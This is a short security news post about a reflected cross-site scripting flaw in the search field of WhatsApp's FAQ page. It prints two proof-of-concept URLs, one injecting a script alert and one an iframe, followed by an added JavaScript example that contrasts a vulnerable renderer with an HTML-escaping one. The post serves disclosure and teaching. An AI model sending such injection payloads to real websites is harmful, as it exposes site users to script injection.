WhatsApp website vulnerable to XSS Security flaw

An information security expert, Narendra Chavda from Ahmedabad, Gujarat, has discovered a non-persistent XSS security flaw in the official website of WhatsApp.

Narendra found that the search query field on the FAQ page of whatsapp.com is vulnerable to an XSS attack.

When an attacker visits "www.whatsapp.com/faq/" and enters XSS code in the field, the site successfully executes the entered script.

PoC code:
www.whatsapp.com/faq/search/?q=<script>alert("E Hacking News")</script>
The site also allows users to inject the iframe code:
http://www.whatsapp.com/faq/search/?q=<iframe src="http://www.ehackingnews.com/"height="1000px"width="1000px">
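
The flaw described above is a search page echoing the q parameter into its HTML without output encoding. The following is an added example, not WhatsApp's code and not part of the original post: a hypothetical search-page renderer shown in its vulnerable form and with the query HTML-escaped, run against the two query values quoted above. All function names and the page markup are assumptions.

```javascript
// Added example: hypothetical renderer for a /faq/search/?q=... page.
// Constructed sample inputs: the two query values quoted in the post.
const SAMPLE_QUERIES = [
  '<script>alert("E Hacking News")</script>',
  '<iframe src="http://www.ehackingnews.com/"height="1000px"width="1000px">',
];

// Escape the characters that are significant in HTML text and quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Read q from the request URL; URLSearchParams percent-decodes the value.
function getQuery(requestUrl) {
  return new URL(requestUrl, 'http://example.invalid').searchParams.get('q') ?? '';
}

// Vulnerable form: q is concatenated into the markup unchanged.
function renderUnsafe(requestUrl) {
  const q = getQuery(requestUrl);
  return `<h1>Results for ${q}</h1><input name="q" value="${q}">`;
}

// Hardened form: q is encoded for the HTML context before it is written out.
function renderSafe(requestUrl) {
  const q = escapeHtml(getQuery(requestUrl));
  return `<h1>Results for ${q}</h1><input name="q" value="${q}">`;
}

// True if the rendered page contains a live script or iframe element.
function containsInjectedTag(html) {
  return /<(script|iframe)\b/i.test(html);
}

// Render both sample queries through both forms and report the outcome.
function demo() {
  return SAMPLE_QUERIES.map((q) => {
    const url = '/faq/search/?q=' + encodeURIComponent(q);
    return {
      unsafe: containsInjectedTag(renderUnsafe(url)),
      safe: containsInjectedTag(renderSafe(url)),
    };
  });
}
```

With escaping in place the query is displayed as text in the results heading and the search box instead of being parsed as markup.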